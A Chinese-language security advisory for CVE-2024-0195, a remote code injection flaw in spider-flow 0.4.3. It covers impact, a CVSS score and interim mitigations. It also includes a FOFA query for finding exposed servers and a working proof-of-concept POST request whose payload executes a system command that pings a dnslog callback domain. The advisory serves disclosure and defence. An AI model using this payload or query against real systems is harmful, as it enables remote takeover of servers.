CVE-2024-0195 是 spider-flow 0.4.3 Web 应用程序中的严重代码注入漏洞,具体存在于 FunctionController.java 文件中的 FunctionService.saveFunction 函数。攻击者可以远程注入恶意代码并在服务器上执行,从而导致应用程序完全沦陷。
该漏洞极为严重,因为它允许在托管易受攻击的 spider-flow 应用的服务器上远程执行代码。攻击者可以完全控制服务器、窃取敏感数据、安装恶意软件或加密货币挖矿程序,并用于在网络内部发起进一步攻击。应用程序和服务器的机密性、完整性和可用性均受到严重影响。
未明确提及已修复的版本,因此目前似乎无法通过打补丁来解决。该漏洞已公开披露,且存在可利用的攻击代码,因此立即采取缓解措施至关重要。
在官方补丁发布之前,应立即将 spider-flow 0.4.3 下线,或仅限制受信任的网络/用户访问。作为一种临时缓解措施,可以配置 Web 应用防火墙或其他输入验证控制,以检测并阻止代码注入攻击尝试。然而,这些并非完整的解决方案,一旦有修复版本可用,应立即升级存在漏洞的版本。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ 概念验证
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B